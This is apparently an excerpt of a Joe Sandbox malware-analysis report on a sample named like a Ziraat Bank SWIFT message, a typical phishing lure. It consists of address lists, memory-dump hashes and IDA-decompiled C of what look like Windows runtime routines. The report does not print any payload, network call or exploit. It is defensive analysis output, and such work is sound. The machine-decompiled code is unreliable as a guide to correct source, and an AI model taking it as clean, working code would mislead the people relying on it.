                                                                    0x018c2788
                                                                    0x018c2788
                                                                    0x018c278b
                                                                    0x018c278e
                                                                    0x018c278e
                                                                    0x018c278e
                                                                    0x018c2791
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c2756
                                                                    0x018c2750
                                                                    0x00000000
                                                                    0x018c2794
                                                                    0x018c2794
                                                                    0x018c2795
                                                                    0x018c2798
                                                                    0x018c2798
                                                                    0x00000000
                                                                    0x018c2734
                                                                    0x018c272c
                                                                    0x018c2700
                                                                    0x018c25ef
                                                                    0x018c25ef
                                                                    0x018c25ef
                                                                    0x018c25f2
                                                                    0x018c25f8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c25fe
                                                                    0x00000000
                                                                    0x018c28e6
                                                                    0x018c28ec
                                                                    0x018c28ef
                                                                    0x018c28f5
                                                                    0x018c28f8
                                                                    0x018c28f8
                                                                    0x00000000
                                                                    0x018c28f8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c2866
                                                                    0x018c2866
                                                                    0x018c2876
                                                                    0x018c2879
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c27e0
                                                                    0x018c27e7
                                                                    0x018c27e9
                                                                    0x018c27eb
                                                                    0x01905afd
                                                                    0x00000000
                                                                    0x01905afd
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c2633
                                                                    0x018c2638
                                                                    0x018c263b
                                                                    0x018c263c
                                                                    0x018c263e
                                                                    0x018c2640
                                                                    0x018c2642
                                                                    0x018c2647
                                                                    0x018c2649
                                                                    0x018c264e
                                                                    0x018c2650
                                                                    0x018c2653
                                                                    0x018c2659
                                                                    0x018c26a2
                                                                    0x018c26a7
                                                                    0x018c26ac
                                                                    0x018c26b2
                                                                    0x01905b11
                                                                    0x01905b15
                                                                    0x01905b17
                                                                    0x00000000
                                                                    0x018c26b8
                                                                    0x018c26b8
                                                                    0x018c26ba
                                                                    0x018c27a6
                                                                    0x018c27a6
                                                                    0x018c27a9
                                                                    0x018c27ab
                                                                    0x018c27b9
                                                                    0x018c27b9
                                                                    0x018c27be
                                                                    0x018c27c1
                                                                    0x018c27c3
                                                                    0x018c27c5
                                                                    0x018c27c7
                                                                    0x01905c74
                                                                    0x01905c79
                                                                    0x01905c79
                                                                    0x018c27c7
                                                                    0x00000000
                                                                    0x018c26c0
                                                                    0x018c26c0
                                                                    0x018c26c3
                                                                    0x018c26c6
                                                                    0x018c26c6
                                                                    0x018c26c9
                                                                    0x018c26c9
                                                                    0x00000000
                                                                    0x018c26c9
                                                                    0x018c26ba
                                                                    0x018c265b
                                                                    0x018c265b
                                                                    0x018c265e
                                                                    0x018c2667
                                                                    0x018c266d
                                                                    0x018c2677
                                                                    0x018c267c
                                                                    0x018c267f
                                                                    0x018c2681
                                                                    0x01905b49
                                                                    0x01905b4e
                                                                    0x018c27cd
                                                                    0x018c27d0
                                                                    0x018c27d1
                                                                    0x018c27d2
                                                                    0x018c27d4
                                                                    0x018c27dd
                                                                    0x018c2687
                                                                    0x018c2687
                                                                    0x018c268a
                                                                    0x018c268b
                                                                    0x018c268e
                                                                    0x018c268f
                                                                    0x018c2691
                                                                    0x018c2696
                                                                    0x018c2698
                                                                    0x018c269d
                                                                    0x018c269f
                                                                    0x00000000
                                                                    0x018c269f
                                                                    0x018c2681
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c2846
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c2605
                                                                    0x018c260a
                                                                    0x018c260c
                                                                    0x018c2611
                                                                    0x018c2616
                                                                    0x018c2619
                                                                    0x018c2619
                                                                    0x018c261e
                                                                    0x00000000
                                                                    0x018c2624
                                                                    0x018c2627
                                                                    0x018c2627
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01905b1f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c2894
                                                                    0x018c289b
                                                                    0x018c289d
                                                                    0x018c28a1
                                                                    0x01905b2b
                                                                    0x01905b2e
                                                                    0x01905b2e
                                                                    0x018c28a7
                                                                    0x018c28a9
                                                                    0x01905b04
                                                                    0x01905b09
                                                                    0x01905b09
                                                                    0x01905b09
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01905b35
                                                                    0x01905b3c
                                                                    0x018c28fb
                                                                    0x018c28fb
                                                                    0x018c26cc
                                                                    0x018c26cc
                                                                    0x018c26d0
                                                                    0x00000000
                                                                    0x018c26d2
                                                                    0x018c26d2
                                                                    0x00000000
                                                                    0x018c26d2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c25fe
                                                                    0x018c292d
                                                                    0x018c292f
                                                                    0x018c2930
                                                                    0x018c2935
                                                                    0x018c2937
                                                                    0x018c2939
                                                                    0x018c2941
                                                                    0x018c2945
                                                                    0x018c2946
                                                                    0x018c294d
                                                                    0x018c294e
                                                                    0x018c2950
                                                                    0x018c2958
                                                                    0x018c295a
                                                                    0x018c2961
                                                                    0x018c2963
                                                                    0x018c2965
                                                                    0x018c2966
                                                                    0x018c296e
                                                                    0x018c296f
                                                                    0x018c2971
                                                                    0x018c2974
                                                                    0x018c297c
                                                                    0x018c297e
                                                                    0x018c297f
                                                                    0x018c2980
                                                                    0x018c2981
                                                                    0x018c2982
                                                                    0x018c2983
                                                                    0x018c2984
                                                                    0x018c2985
                                                                    0x018c2986
                                                                    0x018c2987
                                                                    0x018c2988
                                                                    0x018c2989
                                                                    0x018c298a
                                                                    0x018c298b
                                                                    0x018c298c
                                                                    0x018c298d
                                                                    0x018c298e
                                                                    0x018c298f
                                                                    0x018c2990
                                                                    0x018c2992
                                                                    0x018c2997
                                                                    0x018c29a3
                                                                    0x018c29a6
                                                                    0x018c29ab
                                                                    0x018c29ad
                                                                    0x018c29b0
                                                                    0x018c29b2
                                                                    0x01905c80
                                                                    0x018c29b8
                                                                    0x018c29b8
                                                                    0x018c29bb
                                                                    0x018c29c0
                                                                    0x018c29c5
                                                                    0x018c29c6
                                                                    0x018c29c6
                                                                    0x018c29c9
                                                                    0x018c29cb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018c29cd
                                                                    0x018c29d0
                                                                    0x018c29d9
                                                                    0x018c29db
                                                                    0x018c29dd
                                                                    0x018c2a7f
                                                                    0x018c2a84
                                                                    0x018c2a87
                                                                    0x018c2a89
                                                                    0x01905ca1
                                                                    0x01905ca3
                                                                    0x00000000
                                                                    0x018c2a8f
                                                                    0x018c2a8f
                                                                    0x00000000
                                                                    0x018c2a8f
                                                                    0x00000000
                                                                    0x018c29e3
                                                                    0x018c29e3
                                                                    0x018c29e3
                                                                    0x00000000
                                                                    0x018c29e3
                                                                    0x018c29dd
                                                                    0x00000000
                                                                    0x018c29db
                                                                    0x018c29e6
                                                                    0x018c29e9
                                                                    0x018c29eb
                                                                    0x018c29ed
                                                                    0x018c29f3
                                                                    0x018c29f5
                                                                    0x018c29f8
                                                                    0x018c29fa
                                                                    0x018c2a97
                                                                    0x018c2a9a
                                                                    0x018c2a9d
                                                                    0x018c2add
                                                                    0x00000000
                                                                    0x018c2a9f
                                                                    0x018c2aa2
                                                                    0x018c2aa5
                                                                    0x018c2aa8
                                                                    0x018c2aab
                                                                    0x01905cab
                                                                    0x01905caf
                                                                    0x01905cc5
                                                                    0x01905cda
                                                                    0x01905cdc
                                                                    0x01905cdf
                                                                    0x01905ce5
                                                                    0x00000000
                                                                    0x01905ceb
                                                                    0x01905ced
                                                                    0x01905cee
                                                                    0x00000000
                                                                    0x01905cee
                                                                    0x01905cb1
                                                                    0x01905cb4
                                                                    0x01905cb9
                                                                    0x01905cbb
                                                                    0x00000000
                                                                    0x01905cbd
                                                                    0x01905cbd
                                                                    0x00000000
                                                                    0x01905cbd
                                                                    0x01905cbb
                                                                    0x018c2ab1
                                                                    0x018c2ab1
                                                                    0x018c2ac4
                                                                    0x018c2ac6
                                                                    0x018c2ac6
                                                                    0x00000000
                                                                    0x018c2ac6
                                                                    0x018c2aab
                                                                    0x00000000
                                                                    0x018c2a00
                                                                    0x018c2a09
                                                                    0x018c2a0e
                                                                    0x018c2a21
                                                                    0x018c2a24
                                                                    0x018c2a35
                                                                    0x018c2a3a
                                                                    0x018c2a3d
                                                                    0x018c2a42
                                                                    0x018c2a59
                                                                    0x018c2a59
                                                                    0x018c2a5c
                                                                    0x018c2a5f
                                                                    0x018c2a5f
                                                                    0x018c29fa
                                                                    0x018c29f3
                                                                    0x018c2a64
                                                                    0x018c2a64
                                                                    0x018c2a6b
                                                                    0x018c2a6b
                                                                    0x018c2a6d
                                                                    0x018c2a72
                                                                    0x018c2a72
                                                                    0x00000000

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PATH
                                                                    • API String ID: 0-1036084923
                                                                    • Opcode ID: 57d213d8d2a16fc1dfcfb0b6d36458b240dddac756dacdbc30a2c0b3192b4125
                                                                    • Instruction ID: 0cde5366ca1c58314600aa25a42a2a22481bf368ef8d6ccec709f9fb47ff9775
                                                                    • Opcode Fuzzy Hash: 57d213d8d2a16fc1dfcfb0b6d36458b240dddac756dacdbc30a2c0b3192b4125
                                                                    • Instruction Fuzzy Hash: 9AC17D75D00219DBDB25DFACD880AADBBB6FF48B44F49402DE505EB290D734EA42CB60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 42%
                                                                    			E0189C962(intOrPtr __ecx) {
                                                                    				signed int _v8;
                                                                    				intOrPtr _v12;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* _t19;
                                                                    				intOrPtr _t22;
                                                                    				void* _t26;
                                                                    				void* _t27;
                                                                    				void* _t32;
                                                                    				intOrPtr _t34;
                                                                    				void* _t35;
                                                                    				void* _t37;
                                                                    				intOrPtr* _t38;
                                                                    				signed int _t39;
                                                                    
                                                                    				_t41 = (_t39 & 0xfffffff8) - 0xc;
                                                                    				_v8 =  *0x198d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                                                                    				_t34 = __ecx;
                                                                    				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                                                                    					_t26 = 0;
                                                                    					E018AEEF0(0x19870a0);
                                                                    					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                                                                    					if(E0191F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                                                                    						L9:
                                                                    						E018AEB70(_t29, 0x19870a0);
                                                                    						_t19 = _t26;
                                                                    						L2:
                                                                    						_pop(_t35);
                                                                    						_pop(_t37);
                                                                    						_pop(_t27);
                                                                    						return E018DB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                                                                    					}
                                                                    					_t29 = _t34;
                                                                    					_t26 = E0191F1FC(_t34, _t32);
                                                                    					if(_t26 < 0) {
                                                                    						goto L9;
                                                                    					}
                                                                    					_t38 =  *0x19870c0; // 0x0
                                                                    					while(_t38 != 0x19870c0) {
                                                                    						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                                                                    						_t38 =  *_t38;
                                                                    						_v12 = _t22;
                                                                    						if(_t22 != 0) {
                                                                    							_t29 = _t22;
                                                                    							 *0x198b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                                                                    							_v12();
                                                                    						}
                                                                    					}
                                                                    					goto L9;
                                                                    				}
                                                                    				_t19 = 0;
                                                                    				goto L2;
                                                                    			}


















                                                                    0x0189c96a
                                                                    0x0189c974
                                                                    0x0189c988
                                                                    0x0189c98a
                                                                    0x01907c9d
                                                                    0x01907c9f
                                                                    0x01907ca4
                                                                    0x01907cae
                                                                    0x01907cf0
                                                                    0x01907cf5
                                                                    0x01907cfa
                                                                    0x0189c992
                                                                    0x0189c996
                                                                    0x0189c997
                                                                    0x0189c998
                                                                    0x0189c9a3
                                                                    0x0189c9a3
                                                                    0x01907cb0
                                                                    0x01907cb7
                                                                    0x01907cbb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x01907cbd
                                                                    0x01907ce8
                                                                    0x01907cc5
                                                                    0x01907cc8
                                                                    0x01907cca
                                                                    0x01907cd0
                                                                    0x01907cd6
                                                                    0x01907cde
                                                                    0x01907ce4
                                                                    0x01907ce4
                                                                    0x01907cd0
                                                                    0x00000000
                                                                    0x01907ce8
                                                                    0x0189c990
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9b14c0c12bae7dc060d632cbeea2968a02e5af81991dcfbf692ad393466d221b
                                                                    • Instruction ID: 5b3d9e17a2e407fbdf66c92902d4146de1dc6d9a12574348e70c0f4a087ccf30
                                                                    • Opcode Fuzzy Hash: 9b14c0c12bae7dc060d632cbeea2968a02e5af81991dcfbf692ad393466d221b
                                                                    • Instruction Fuzzy Hash: E811253170061A9FC719AFACDC84A2BB7E5BBC4720B200928E98983691DB20FD15C7D1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 80%
                                                                    			E018CFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                                    				char _v5;
                                                                    				signed int _v8;
                                                                    				signed int _v12;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v20;
                                                                    				signed int _v24;
                                                                    				char _v28;
                                                                    				char _v32;
                                                                    				signed int _v40;
                                                                    				void* __ecx;
                                                                    				void* __edi;
                                                                    				void* __ebp;
                                                                    				signed int _t73;
                                                                    				intOrPtr* _t75;
                                                                    				signed int _t77;
                                                                    				signed int _t79;
                                                                    				signed int _t81;
                                                                    				intOrPtr _t83;
                                                                    				intOrPtr _t85;
                                                                    				intOrPtr _t86;
                                                                    				signed int _t91;
                                                                    				signed int _t94;
                                                                    				signed int _t95;
                                                                    				signed int _t96;
                                                                    				signed int _t106;
                                                                    				signed int _t108;
                                                                    				signed int _t114;
                                                                    				signed int _t116;
                                                                    				signed int _t118;
                                                                    				signed int _t122;
                                                                    				signed int _t123;
                                                                    				void* _t129;
                                                                    				signed int _t130;
                                                                    				void* _t132;
                                                                    				intOrPtr* _t134;
                                                                    				signed int _t138;
                                                                    				signed int _t141;
                                                                    				signed int _t147;
                                                                    				intOrPtr _t153;
                                                                    				signed int _t154;
                                                                    				signed int _t155;
                                                                    				signed int _t170;
                                                                    				void* _t174;
                                                                    				signed int _t176;
                                                                    				signed int _t177;
                                                                    
                                                                    				_t129 = __ebx;
                                                                    				_push(_t132);
                                                                    				_push(__esi);
                                                                    				_t174 = _t132;
                                                                    				_t73 =  !( *( *(_t174 + 0x18)));
                                                                    				if(_t73 >= 0) {
                                                                    					L5:
                                                                    					return _t73;
                                                                    				} else {
                                                                    					E018AEEF0(0x1987b60);
                                                                    					_t134 =  *0x1987b84; // 0x77de7b80
                                                                    					_t2 = _t174 + 0x24; // 0x24
                                                                    					_t75 = _t2;
                                                                    					if( *_t134 != 0x1987b80) {
                                                                    						_push(3);
                                                                    						asm("int 0x29");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						asm("int3");
                                                                    						_push(0x1987b60);
                                                                    						_t170 = _v8;
                                                                    						_v28 = 0;
                                                                    						_v40 = 0;
                                                                    						_v24 = 0;
                                                                    						_v17 = 0;
                                                                    						_v32 = 0;
                                                                    						__eflags = _t170 & 0xffff7cf2;
                                                                    						if((_t170 & 0xffff7cf2) != 0) {
                                                                    							L43:
                                                                    							_t77 = 0xc000000d;
                                                                    						} else {
                                                                    							_t79 = _t170 & 0x0000000c;
                                                                    							__eflags = _t79;
                                                                    							if(_t79 != 0) {
                                                                    								__eflags = _t79 - 0xc;
                                                                    								if(_t79 == 0xc) {
                                                                    									goto L43;
                                                                    								} else {
                                                                    									goto L9;
                                                                    								}
                                                                    							} else {
                                                                    								_t170 = _t170 | 0x00000008;
                                                                    								__eflags = _t170;
                                                                    								L9:
                                                                    								_t81 = _t170 & 0x00000300;
                                                                    								__eflags = _t81 - 0x300;
                                                                    								if(_t81 == 0x300) {
                                                                    									goto L43;
                                                                    								} else {
                                                                    									_t138 = _t170 & 0x00000001;
                                                                    									__eflags = _t138;
                                                                    									_v24 = _t138;
                                                                    									if(_t138 != 0) {
                                                                    										__eflags = _t81;
                                                                    										if(_t81 != 0) {
                                                                    											goto L43;
                                                                    										} else {
                                                                    											goto L11;
                                                                    										}
                                                                    									} else {
                                                                    										L11:
                                                                    										_push(_t129);
                                                                    										_t77 = E018A6D90( &_v20);
                                                                    										_t130 = _t77;
                                                                    										__eflags = _t130;
                                                                    										if(_t130 >= 0) {
                                                                    											_push(_t174);
                                                                    											__eflags = _t170 & 0x00000301;
                                                                    											if((_t170 & 0x00000301) == 0) {
                                                                    												_t176 = _a8;
                                                                    												__eflags = _t176;
                                                                    												if(__eflags == 0) {
                                                                    													L64:
                                                                    													_t83 =  *[fs:0x18];
                                                                    													_t177 = 0;
                                                                    													__eflags =  *(_t83 + 0xfb8);
                                                                    													if( *(_t83 + 0xfb8) != 0) {
                                                                    														E018A76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                                    														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                                    													}
                                                                    													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                                    													goto L15;
                                                                    												} else {
                                                                    													asm("sbb edx, edx");
                                                                    													_t114 = E01938938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                                    													__eflags = _t114;
                                                                    													if(_t114 < 0) {
                                                                    														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                                    														E0189B150();
                                                                    													}
                                                                    													_t116 = E01936D81(_t176,  &_v16);
                                                                    													__eflags = _t116;
                                                                    													if(_t116 >= 0) {
                                                                    														__eflags = _v16 - 2;
                                                                    														if(_v16 < 2) {
                                                                    															L56:
                                                                    															_t118 = E018A75CE(_v20, 5, 0);
                                                                    															__eflags = _t118;
                                                                    															if(_t118 < 0) {
                                                                    																L67:
                                                                    																_t130 = 0xc0000017;
                                                                    																goto L32;
                                                                    															} else {
                                                                    																__eflags = _v12;
                                                                    																if(_v12 == 0) {
                                                                    																	goto L67;
                                                                    																} else {
                                                                    																	_t153 =  *0x1988638; // 0x0
                                                                    																	_t122 = L018A38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                                    																	_t154 = _v12;
                                                                    																	_t130 = _t122;
                                                                    																	__eflags = _t130;
                                                                    																	if(_t130 >= 0) {
                                                                    																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                                    																		__eflags = _t123;
                                                                    																		if(_t123 != 0) {
                                                                    																			_t155 = _a12;
                                                                    																			__eflags = _t155;
                                                                    																			if(_t155 != 0) {
                                                                    																				 *_t155 = _t123;
                                                                    																			}
                                                                    																			goto L64;
                                                                    																		} else {
                                                                    																			E018A76E2(_t154);
                                                                    																			goto L41;
                                                                    																		}
                                                                    																	} else {
                                                                    																		E018A76E2(_t154);
                                                                    																		_t177 = 0;
                                                                    																		goto L18;
                                                                    																	}
                                                                    																}
                                                                    															}
                                                                    														} else {
                                                                    															__eflags =  *_t176;
                                                                    															if( *_t176 != 0) {
                                                                    																goto L56;
                                                                    															} else {
                                                                    																__eflags =  *(_t176 + 2);
                                                                    																if( *(_t176 + 2) == 0) {
                                                                    																	goto L64;
                                                                    																} else {
                                                                    																	goto L56;
                                                                    																}
                                                                    															}
                                                                    														}
                                                                    													} else {
                                                                    														_t130 = 0xc000000d;
                                                                    														goto L32;
                                                                    													}
                                                                    												}
                                                                    												goto L35;
                                                                    											} else {
                                                                    												__eflags = _a8;
                                                                    												if(_a8 != 0) {
                                                                    													_t77 = 0xc000000d;
                                                                    												} else {
                                                                    													_v5 = 1;
                                                                    													L018CFCE3(_v20, _t170);
                                                                    													_t177 = 0;
                                                                    													__eflags = 0;
                                                                    													L15:
                                                                    													_t85 =  *[fs:0x18];
                                                                    													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                                    													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                                    														L18:
                                                                    														__eflags = _t130;
                                                                    														if(_t130 != 0) {
                                                                    															goto L32;
                                                                    														} else {
                                                                    															__eflags = _v5 - _t130;
                                                                    															if(_v5 == _t130) {
                                                                    																goto L32;
                                                                    															} else {
                                                                    																_t86 =  *[fs:0x18];
                                                                    																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                                    																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                                    																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                                    																}
                                                                    																__eflags = _t177;
                                                                    																if(_t177 == 0) {
                                                                    																	L31:
                                                                    																	__eflags = 0;
                                                                    																	L018A70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                                    																	goto L32;
                                                                    																} else {
                                                                    																	__eflags = _v24;
                                                                    																	_t91 =  *(_t177 + 0x20);
                                                                    																	if(_v24 != 0) {
                                                                    																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                                    																		goto L31;
                                                                    																	} else {
                                                                    																		_t141 = _t91 & 0x00000040;
                                                                    																		__eflags = _t170 & 0x00000100;
                                                                    																		if((_t170 & 0x00000100) == 0) {
                                                                    																			__eflags = _t141;
                                                                    																			if(_t141 == 0) {
                                                                    																				L74:
                                                                    																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                                    																				goto L27;
                                                                    																			} else {
                                                                    																				_t177 = E018CFD22(_t177);
                                                                    																				__eflags = _t177;
                                                                    																				if(_t177 == 0) {
                                                                    																					goto L42;
                                                                    																				} else {
                                                                    																					_t130 = E018CFD9B(_t177, 0, 4);
                                                                    																					__eflags = _t130;
                                                                    																					if(_t130 != 0) {
                                                                    																						goto L42;
                                                                    																					} else {
                                                                    																						_t68 = _t177 + 0x20;
                                                                    																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                                    																						__eflags =  *_t68;
                                                                    																						_t91 =  *(_t177 + 0x20);
                                                                    																						goto L74;
                                                                    																					}
                                                                    																				}
                                                                    																			}
                                                                    																			goto L35;
                                                                    																		} else {
                                                                    																			__eflags = _t141;
                                                                    																			if(_t141 != 0) {
                                                                    																				_t177 = E018CFD22(_t177);
                                                                    																				__eflags = _t177;
                                                                    																				if(_t177 == 0) {
                                                                    																					L42:
                                                                    																					_t77 = 0xc0000001;
                                                                    																					goto L33;
                                                                    																				} else {
                                                                    																					_t130 = E018CFD9B(_t177, 0, 4);
                                                                    																					__eflags = _t130;
                                                                    																					if(_t130 != 0) {
                                                                    																						goto L42;
                                                                    																					} else {
                                                                    																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                                    																						_t91 =  *(_t177 + 0x20);
                                                                    																						goto L26;
                                                                    																					}
                                                                    																				}
                                                                    																				goto L35;
                                                                    																			} else {
                                                                    																				L26:
                                                                    																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                                    																				__eflags = _t94;
                                                                    																				L27:
                                                                    																				 *(_t177 + 0x20) = _t94;
                                                                    																				__eflags = _t170 & 0x00008000;
                                                                    																				if((_t170 & 0x00008000) != 0) {
                                                                    																					_t95 = _a12;
                                                                    																					__eflags = _t95;
                                                                    																					if(_t95 != 0) {
                                                                    																						_t96 =  *_t95;
                                                                    																						__eflags = _t96;
                                                                    																						if(_t96 != 0) {
                                                                    																							 *((short*)(_t177 + 0x22)) = 0;
                                                                    																							_t40 = _t177 + 0x20;
                                                                    																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                                    																							__eflags =  *_t40;
                                                                    																						}
                                                                    																					}
                                                                    																				}
                                                                    																				goto L31;
                                                                    																			}
                                                                    																		}
                                                                    																	}
                                                                    																}
                                                                    															}
                                                                    														}
                                                                    													} else {
                                                                    														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                                    														_t106 =  *(_t147 + 0x20);
                                                                    														__eflags = _t106 & 0x00000040;
                                                                    														if((_t106 & 0x00000040) != 0) {
                                                                    															_t147 = E018CFD22(_t147);
                                                                    															__eflags = _t147;
                                                                    															if(_t147 == 0) {
                                                                    																L41:
                                                                    																_t130 = 0xc0000001;
                                                                    																L32:
                                                                    																_t77 = _t130;
                                                                    																goto L33;
                                                                    															} else {
                                                                    																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                                    																_t106 =  *(_t147 + 0x20);
                                                                    																goto L17;
                                                                    															}
                                                                    															goto L35;
                                                                    														} else {
                                                                    															L17:
                                                                    															_t108 = _t106 | 0x00000080;
                                                                    															__eflags = _t108;
                                                                    															 *(_t147 + 0x20) = _t108;
                                                                    															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                                    															goto L18;
                                                                    														}
                                                                    													}
                                                                    												}
                                                                    											}
                                                                    											L33:
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						L35:
                                                                    						return _t77;
                                                                    					} else {
                                                                    						 *_t75 = 0x1987b80;
                                                                    						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                                    						 *_t134 = _t75;
                                                                    						 *0x1987b84 = _t75;
                                                                    						_t73 = E018AEB70(_t134, 0x1987b60);
                                                                    						if( *0x1987b20 != 0) {
                                                                    							_t73 =  *( *[fs:0x30] + 0xc);
                                                                    							if( *((char*)(_t73 + 0x28)) == 0) {
                                                                    								_t73 = E018AFF60( *0x1987b20);
                                                                    							}
                                                                    						}
                                                                    						goto L5;
                                                                    					}
                                                                    				}
                                                                    			}

















































                                                                    0x018cfab0
                                                                    0x018cfab2
                                                                    0x018cfab3
                                                                    0x018cfab4
                                                                    0x018cfabc
                                                                    0x018cfac0
                                                                    0x018cfb14
                                                                    0x018cfb17
                                                                    0x018cfac2
                                                                    0x018cfac8
                                                                    0x018cfacd
                                                                    0x018cfad3
                                                                    0x018cfad3
                                                                    0x018cfadd
                                                                    0x018cfb18
                                                                    0x018cfb1b
                                                                    0x018cfb1d
                                                                    0x018cfb1e
                                                                    0x018cfb1f
                                                                    0x018cfb20
                                                                    0x018cfb21
                                                                    0x018cfb22
                                                                    0x018cfb23
                                                                    0x018cfb24
                                                                    0x018cfb25
                                                                    0x018cfb26
                                                                    0x018cfb27
                                                                    0x018cfb28
                                                                    0x018cfb29
                                                                    0x018cfb2a
                                                                    0x018cfb2b
                                                                    0x018cfb2c
                                                                    0x018cfb2d
                                                                    0x018cfb2e
                                                                    0x018cfb2f
                                                                    0x018cfb3a
                                                                    0x018cfb3b
                                                                    0x018cfb3e
                                                                    0x018cfb41
                                                                    0x018cfb44
                                                                    0x018cfb47
                                                                    0x018cfb4a
                                                                    0x018cfb4d
                                                                    0x018cfb53
                                                                    0x0190bdcb
                                                                    0x0190bdcb
                                                                    0x018cfb59
                                                                    0x018cfb5b
                                                                    0x018cfb5b
                                                                    0x018cfb5e
                                                                    0x0190bdd5
                                                                    0x0190bdd8
                                                                    0x00000000
                                                                    0x0190bdda
                                                                    0x00000000
                                                                    0x0190bdda
                                                                    0x018cfb64
                                                                    0x018cfb64
                                                                    0x018cfb64
                                                                    0x018cfb67
                                                                    0x018cfb6e
                                                                    0x018cfb70
                                                                    0x018cfb72
                                                                    0x00000000
                                                                    0x018cfb78
                                                                    0x018cfb7a
                                                                    0x018cfb7a
                                                                    0x018cfb7d
                                                                    0x018cfb80
                                                                    0x0190bddf
                                                                    0x0190bde1
                                                                    0x00000000
                                                                    0x0190bde3
                                                                    0x00000000
                                                                    0x0190bde3
                                                                    0x018cfb86
                                                                    0x018cfb86
                                                                    0x018cfb86
                                                                    0x018cfb8b
                                                                    0x018cfb90
                                                                    0x018cfb92
                                                                    0x018cfb94
                                                                    0x018cfb9a
                                                                    0x018cfb9b
                                                                    0x018cfba1
                                                                    0x0190bde8
                                                                    0x0190bdeb
                                                                    0x0190bded
                                                                    0x0190beb5
                                                                    0x0190beb5
                                                                    0x0190bebb
                                                                    0x0190bebd
                                                                    0x0190bec3
                                                                    0x0190bed2
                                                                    0x0190bedd
                                                                    0x0190bedd
                                                                    0x0190beed
                                                                    0x00000000
                                                                    0x0190bdf3
                                                                    0x0190bdfe
                                                                    0x0190be06
